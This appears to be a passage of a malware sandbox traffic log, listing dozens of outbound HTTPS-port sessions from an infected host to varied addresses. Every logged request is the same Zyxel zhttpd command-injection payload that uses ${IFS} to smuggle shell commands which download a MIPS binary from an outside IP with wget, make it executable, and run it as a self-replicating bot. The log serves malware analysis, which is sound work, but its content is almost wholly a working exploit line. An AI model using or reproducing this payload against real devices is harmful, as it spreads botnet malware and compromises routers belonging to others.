                                    Jan 13, 2024 19:02:48.513854027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8069192.168.2.1356380118.122.92.50443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.513884068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8070192.168.2.1346528194.237.192.254443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.513933897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8071192.168.2.1350142149.82.105.76443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.513948917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8072192.168.2.1341016183.245.39.107443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.513973951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8073192.168.2.133404095.49.64.183443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.514008045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8074192.168.2.1357070108.160.118.136443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.514056921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8075192.168.2.1333068166.77.37.183443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.514081955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8076192.168.2.135227043.193.142.188443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.514141083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8077192.168.2.135583083.90.137.230443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.514206886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8078192.168.2.134775698.151.79.171443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.514242887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8079192.168.2.1358544121.198.50.71443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.514276981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8080192.168.2.1351924167.48.227.157443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.514329910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8081192.168.2.133939453.236.116.63443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.514358997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8082192.168.2.1337746154.101.84.123443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.514431000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8083192.168.2.1357262195.10.91.141443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.514470100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8084192.168.2.1338526132.70.198.14443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.514493942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8085192.168.2.1360964134.113.244.97443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.514540911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8086192.168.2.135508894.26.134.7443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.514574051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8087192.168.2.1350238133.52.210.16443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.514636040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8088192.168.2.1354786173.99.121.162443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.514672041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8089192.168.2.1356606163.62.226.190443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.514730930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8090192.168.2.1340934104.107.60.0443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.514780998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8091192.168.2.135255888.114.224.68443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.514811039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8092192.168.2.1349134178.30.209.70443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.514888048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8093192.168.2.1360232155.183.164.109443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.514945030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8094192.168.2.13428424.104.5.2443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.514967918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8095192.168.2.135906819.57.172.47443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.515003920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8096192.168.2.1350496168.7.119.70443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.515073061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8097192.168.2.134878099.14.194.228443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.515111923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8098192.168.2.1359212213.214.81.7443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.515166044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8099192.168.2.1344074163.115.255.235443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.515223026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8100192.168.2.133903278.68.95.50443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.515243053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8101192.168.2.135219841.248.163.181443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.515295029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8102192.168.2.1360536211.201.209.144443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.515331984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8103192.168.2.1342360118.216.200.16443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.515376091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8104192.168.2.1335172122.131.12.114443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.515417099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8105192.168.2.135139269.234.142.152443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.515460014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8106192.168.2.1342756208.85.235.158443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.515505075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8107192.168.2.133743270.248.140.220443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.515553951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8108192.168.2.134555680.21.213.22443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.515609026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8109192.168.2.134369225.71.154.235443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.515638113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8110192.168.2.1344446169.135.100.109443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.515703917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8111192.168.2.1352610184.205.30.10443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.515748024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8112192.168.2.1353780165.234.108.210443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.515815973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8113192.168.2.1349162139.70.53.218443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.515839100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8114192.168.2.135732894.245.23.44443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.515911102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8115192.168.2.135480666.168.51.242443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.515942097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8116192.168.2.1343710204.34.72.103443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.516022921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8117192.168.2.133963276.149.90.254443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.516077995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8118192.168.2.13586621.40.232.45443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.516107082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8119192.168.2.1355440116.51.88.217443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.516184092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8120192.168.2.133434435.72.41.63443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.516195059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8121192.168.2.1344844115.176.73.141443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.516218901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8122192.168.2.1333332176.159.176.211443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.516283989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8123192.168.2.135411686.167.103.144443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.516330957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8124192.168.2.1351572176.93.10.79443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.516391039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8125192.168.2.1340902101.199.152.92443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.516437054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8126192.168.2.1340472104.192.85.217443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.516484022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8127192.168.2.135267467.78.94.22443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.516561985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8128192.168.2.133829697.127.167.57443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.516587973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8129192.168.2.1338240219.29.135.16443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.516613960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8130192.168.2.135799868.188.181.183443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.516680002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8131192.168.2.133635060.242.82.68443
                                    TimestampBytes transferredDirectionData
